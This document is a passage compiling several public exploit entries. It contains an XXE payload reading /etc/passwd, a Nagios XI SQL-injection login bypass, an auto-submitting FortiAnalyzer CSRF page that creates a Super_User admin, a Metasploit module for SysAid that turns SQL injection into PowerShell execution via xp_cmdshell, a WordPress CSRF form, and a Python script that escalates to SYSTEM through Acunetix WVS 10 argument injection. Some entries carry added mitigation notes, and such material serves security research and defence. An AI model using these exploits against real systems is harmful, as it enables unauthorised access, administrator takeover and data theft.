  reference is rejected instead of being dereferenced.
-->
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
              xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
  <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
    <id>C970393BDF6C43E2B030D23482D88EED</id>
    <comments>&xxe;</comments>
  </Product>
</ob:Openbravo>
source: https://www.securityfocus.com/bid/63754/info
Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Nagios XI 2012R2.4 are vulnerable.
POST /nagiosql/index.php HTTP/1.1
Host: localhost
Content-Length: 69
Origin: http://locahost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76
Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/nagiosql/
Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3
tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login
source: https://www.securityfocus.com/bid/63663/info
FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.
Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable.
<!--
  CSRF proof of concept against the FortiAnalyzer admin-user dialog. The form
  auto-submits on load and creates an administrator ("user.via.cfsr",
  profile Super_User, password 123456) whose trusted-host ranges cover the
  entire IPv4 and IPv6 address space, riding on whatever session cookie the
  victim's browser attaches to the request. The last field is the tell:
  csrf_token is submitted empty, so the endpoint presumably did not enforce
  a valid token (the advisory's "fails to properly validate HTTP requests").

  Markup defects preserved from the original: <html> and <body> are opened
  twice, and the action attribute is followed by a stray ";" after its
  closing quote.

  Mitigation: bind csrf_token to the session and reject requests where it is
  missing or mismatched; SameSite=Lax/Strict on the session cookie as
  defence in depth. Newly created Super_User administrators with all-zero /
  all-ones trusted hosts are a useful audit-log alert.
-->
<html>
<body onload="CSRF.submit();">
<html>
<body onload="CSRF.submit();">
<form id="csrf"
      action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
      method="post" name="CSRF">
  <input name="userId" value="user.via.cfsr"> </input>
  <input name="type" value="0"> </input>
  <input name="rserver" value=""> </input>
  <input name="lserver" value=""> </input>
  <input name="subject" value=""> </input>
  <input name="cacerts" value="Fortinet_CA2"> </input>
  <input name="password" value="123456"> </input>
  <input name="password_updated" value="1"> </input>
  <input name="confirm_pwd" value="123456"> </input>
  <input name="confirm_pwd_updated" value="1"> </input>
  <!-- trusted-host lists: first entry matches everything, the rest are fillers -->
  <input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
  <input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
  <input name="host6_1"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_2"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_3"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_4"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_5"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_6"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_7"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_8"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_9"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="host6_10"
         value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
  <input name="profile" value="Super_User"> </input>
  <input name="alladomRDGrp" value="0"> </input>
  <input name="_adom" value=""> </input>
  <input name="allpackRDGrp" value="0"> </input>
  <input name="_adom" value=""> </input>
  <input name="allpackRDGrp" value="0"> </input>
  <input name="_pack" value=""> </input>
  <input name="desc" value=""> </input>
  <input name="showForce" value="0"> </input>
  <input name="numhosts" value="0"> </input>
  <input name="numhosts6" value="3"> </input>
  <input name="_comp_8" value="OK"> </input>
  <input name="actionevent" value="new"> </input>
  <input name="profileId" value=""> </input>
  <input name="mgt" value=""> </input>
  <input name="dashboard" value=""> </input>
  <input name="dashboardmodal" value=""> </input>
  <!-- empty anti-CSRF token: the request is still accepted -->
  <input name="csrf_token" value=""> </input>
</form>
</body>
</html>
# Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi
# Date: 28.11.2015
# Exploit Author: hland
# Vendor Homepage: https://www.sysaid.com/
# Version: v14.4.32 b25
# Tested on: Windows 7, Windows 10
# Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/exploit/mssql_commands'
##
# Unauthenticated SQL injection in the SysAid Help Desk "menu" API parameter,
# escalated to code execution through MSSQL xp_cmdshell.
#
# Flow (see #exploit): fetch Login.jsp to obtain a session cookie, then send
# two GETs to api/v1/menu/menu_items whose `menu` value closes the original
# string literal and appends stacked statements — the first enables
# xp_cmdshell and runs a PowerShell payload, the second switches it off again.
#
# Defender notes: the root cause is string concatenation of `menu` into a SQL
# statement (fix: parameterised queries), compounded by the application
# connecting as SA (fix: a least-privilege login, under which sp_configure
# and xp_cmdshell simply fail). Observable artefacts: SQL Server audit /
# Extended Events for sp_configure 'xp_cmdshell' and RECONFIGURE, and web
# logs showing SQL keywords in the `menu` query parameter.
##
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpClient

  # Module metadata.
  # NOTE(review): the CVE reference is the literal placeholder 'xxxx', and
  # 'Privileged' => false contradicts the description's claim of SYSTEM-level
  # execution — one of the two should be corrected.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Sysaid Helpdesk Software Unauthenticated SQLi",
      'Description' => %q{
        This module exploits an unauthenticated SQLi vulnerability in the Sysaid
        Helpdesk Free software. Because the "menu" parameter is not handled correctly,
        a malicious user can manipulate the SQL query, and allows
        arbitrary code execution under the context of 'SYSTEM' because the database
        runs as the SA user. This module uses a Metasploit generated Powershell payload and
        uses xp_cmdshell, which is activated and then deactivated after exploitation.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Hland',
        ],
      'References' =>
        [
          ['CVE', 'xxxx'],
        ],
      'Payload' =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Sysaid Helpdesk <= v14.4.32 b25', {}]
        ],
      'Privileged' => false,
      'DisclosureDate' => "Aug 29 2015",
      'DefaultTarget' => 0,
    ))
    register_options(
      [
        OptPort.new('RPORT', [true, "The web application's port", 8080]),
        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
      ], self.class)
  end

  # Fingerprint the target by the <title> of its login page.
  # NOTE(review): String#scan returns an Array, which is truthy even when
  # empty, so the `if not v` branch is never taken and every host that returns
  # a body is reported as Appears (`v.empty?` was presumably intended). `res`
  # is used without a nil check, so a connection failure raises instead of
  # returning Unknown, and the final `return Exploit::CheckCode::Unknown` is
  # unreachable.
  def check
    peer = "#{rhost}:#{rport}"
    uri = target_uri.path
    uri = normalize_uri(uri,"Login.jsp")
    print_status("#{peer} - Checking for vulnerability")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'vars_get' => {
      }
    })
    v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/)
    if not v
      vprint_error("Is this even a Sysaid Help Desk?")
      return Exploit::CheckCode::Safe
    else
      vprint_status("Identified system as Sysaid Help Desk")
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Unknown
  end

  # Run a command through xp_cmdshell using an mssql_query helper.
  # NOTE(review): no mixin that provides mssql_query is included above (only
  # Powershell and HttpClient are), and nothing in this file calls this method;
  # #exploit builds its own SQL string instead. `force_enable` is assigned but
  # never read, so `retry` re-issues the identical query — if the server keeps
  # answering "xp_cmdshell disabled" this loops without bound.
  def mssql_xpcmdshell(cmd,doprint=false,opts={})
    force_enable = false
    begin
      res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint)
      #mssql_print_reply(res) if doprint
      return res
    rescue RuntimeError => e
      if(e.to_s =~ /xp_cmdshell disabled/)
        force_enable = true
        retry
      end
      raise e
    end
  end

  # Two-stage request sequence; see the class comment for the overall flow.
  def exploit
    peer = "#{rhost}:#{rport}"
    uri = target_uri.path
    vprint_line("#{peer} - Getting a session token...")
    # Any 200 from Login.jsp is enough here: the cookie it sets is what the
    # API requests below carry.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, "Login.jsp"),
      'vars_get' => {
      }
    })
    vprint_line("#{peer} - Cookie's in the jar...")
    # Got a cookie, now ready to make exploiting requests
    if res && res.code == 200
      #vprint_line("#{res.headers}")
      cookies = res.get_cookies
      #vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}")
    else
      vprint_line("No 200 response? I'm outta here")
      return
    end
    # Put together the vulnerable URI
    uri = normalize_uri(uri,"api","v1","menu","menu_items")
    # Generate powershell payload as an encoded string (encode_final_payload
    # presumably so the command contains no quote characters that would break
    # the SQL string literal it is embedded in)
    powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true})
    #
    # Inject payload and wait for shell
    #
    # Stacked-query injection: closes the 'main' literal, enables advanced
    # options and xp_cmdshell, runs the payload, then comments out the rest
    # of the original statement.
    print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability")
    sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'cookie' => cookies,
      'vars_get' => {
        'menu' => sqli,
      }
    })
    # Deactivate XPCmdShell: a second injection reverts both sp_configure
    # flags. Neither response is inspected (`res` is overwritten, never read),
    # so success is inferred solely from the payload connecting back.
    sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--"
    print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'cookie' => cookies,
      'vars_get' => {
        'menu' => sqli,
      }
    })
  end
end
source: https://www.securityfocus.com/bid/63814/info
nginx is prone to a remote security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
nginx 0.8.41 through 1.5.6 are vulnerable.
The following example data is available:
/file \0.php
source: https://www.securityfocus.com/bid/63805/info
SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities.
Attackers can exploit these issues to execute arbitrary commands in the context of the affected system.
SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected.
# Replays a captured Hessian request body (manual-release.raw, not included on
# this page) against the SKIDATA Freemotion.Gate "CP" Hessian endpoint on port
# 7777. The advisory attributes command execution to this interface; the
# serialized body is what carries the action. Output and errors are discarded,
# so the result is not checked. No authentication appears anywhere in the
# request — restricting network access to port 7777 and requiring
# authentication on the Hessian service are the obvious compensating controls.
curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1
source: https://www.securityfocus.com/bid/63800/info
The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected.
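<!--
  CSRF proof of concept for the Blue Wrench Video Widget settings page: a
  form posting the plugin's own field names (bw_title, bw_url) to
  wp-admin/admin.php?page=bw-videos. Nothing in the request carries a nonce
  or any other per-session token, which is the condition the advisory
  describes; the victim's logged-in session supplies the authorisation.

  Encoding repair: the extracted copy had every double quote replaced by
  ".", restored here; the Title row was also missing its closing </td>.

  Mitigation (plugin side): emit the settings form with wp_nonce_field()
  and verify it with check_admin_referer() before saving, and check the
  current user's capability on the handler.
-->
<form id="upload-form"
      action="http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos"
      method="post">
  <table class="form-table">
    <tbody>
      <tr valign="top">
        <th scope="row">Title</th>
        <td><input id="bw_title" type="text" maxlength="75" name="bw_title"
                   size="70" value="http://www.example2.com/code/evil.js" />
        </td>
      </tr>
      <tr valign="top ">
        <th scope="row">URL</th>
        <td><input id="bw_url" type="text" maxlength="75" name="bw_url"
                   size="70" value="http://www.example2.com/code/evil.js" />
        </td>
      </tr>
    </tbody>
  </table>
</form>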
'''
========================================================================
Acunetix WVS 10 - from guest to System (Local privilege escalation)
CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix WVS 10; it allows
a local user (even guest) to gain the same privileges as the System user.
With a default Acunetix installation, a service called "AcuWVSSchedulerv10"
is installed; this service runs as the local System user.
AcuWVSSchedulerv10 is responsible for scan scheduling without user interaction;
it exposes an API, reachable through a web server, usually on localhost:8183.
API:
/listScan
/addScan <== vulnerable one
/deleteScan
etc...
When a user schedules a scan, the "addScan" API is called as follows
-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{
"scanType": "scan",
"targetList": "",
"target": ["http://.target.it"],
"recurse": "-1",
"date": "12/2/2015",
"dayOfWeek": "1",
"dayOfMonth": "1",
"time": "12:21",
"deleteAfterCompletion": "False",
"params": {
"profile": "Default",
"loginSeq": "<none>",
"settings": "Default",
"scanningmode": "heuristic",
"excludedhours": "<none>",
"savetodatabase": "True",
"savelogs": "False",
"generatereport": "False",
"reportformat": "PDF",
"reporttemplate": "WVSAffectedItemsReport.rep",
"emailaddress": ""
}
}
------------------------------------------------------------------------------
The first thing I noticed was the reporttemplate: this was used to create the report
when scanning ends, so it means an external file which we can control will then be
used by System! This would be interesting enough, but I never looked deeper into it.
Instead I noticed something even worse: the filename was used as an argument to wvs.exe,
which is called with System privileges!
By looking at how Acunetix handled the reporttemplate argument I figured out that it was
possible to inject custom arguments within reporttemplate. Now this is where
Acunetix helps us :D — in fact wvs was provided with an interesting argument,
/Run, as the reference says:
https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
Run a command line command during the crawl.
Syntax: /Run [command]
Example: /Run curl http://example.com/dir1/
Wow, that's really nice. So in order to execute a command we must insert a fake
Crawl followed by a Run command, so reporttemplate becomes:
"reporttemplate": "WVSAffectedItemsReport.rep /Crawl http://fakesite.it /Run cmd.exe"
It worked: cmd ran as System!
==================================================================================
Now let's pwn this!
escalation.py
'''
import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime
# Command to be run as SYSTEM; defaults to cmd.exe when no argument is given.
COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
# The scheduler service's local web API (see the write-up above).
ACUHOST = '127.0.0.1'
ACUPORT = 8183
# Headers copied from a legitimate browser request. RequestValidated is set by
# the client and is presumably the only thing the service checks.
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
}
# Argument injection appended to the report template name: wvs.exe's /Run
# switch executes COMMAND during the (fake) crawl. Defender note: the fix is to
# treat reporttemplate as a file name validated against the template directory
# rather than splicing it into the wvs.exe command line; the write-up states a
# vendor patch exists.
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
ACUDATA = {"scanType":"scan",
    "targetList":"",
    # Deliberately bogus 2 KB target URL — presumably so no real host is scanned.
    "target":["http://"+"A"*2048],
    "recurse":"-1",
    # NOTE(review): the date comes from gmtime() (UTC) but the time from
    # datetime.now() (local); near midnight these can disagree on the day.
    "date":strftime("%m/%d/%Y", gmtime()),
    "dayOfWeek":"1",
    "dayOfMonth":"1",
    # NOTE(review): minute+1 is not wrapped (HH:59 -> "HH:60") and neither
    # field is zero-padded ("%s" gives "12:5"); how the scheduler treats such
    # values is not visible here.
    "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
    "deleteAfterCompletion":"False",
    "params":{"profile":"Default",
        "loginSeq":"<none>",
        "settings":"Default",
        "scanningmode":"heuristic",
        "excludedhours":"<none>",
        "savetodatabase":"True",
        "savelogs":"False",
        "generatereport":"False",
        "reportformat":"PDF",
        # The injected value rides on an otherwise valid template name.
        "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
        "emailaddress":""}
}
def sendExploit():
    """POST the crafted addScan job to the local scheduler API.

    Returns the HTTP status line ("<code> <reason>") of the scheduler's reply;
    the response body is not read. `httplib` is the Python 2 name of
    http.client. NOTE(review): the connection is never closed explicitly.
    """
    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)
# Python 2 print statements. Note that "Done" only means the job was accepted:
# per the write-up, wvs.exe (and thus COMMAND) runs when the scheduled time
# in ACUDATA["time"] — one minute ahead — is reached, not when this request
# returns.
print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"
'''
============================================================================
I hope this write-up was entertaining enough; anyway, I really would like to thank
the Acunetix product manager N.S. for the really fast answer and bug mitigation.
A patch exists now, so hurry up and download it.
============================================================================
'''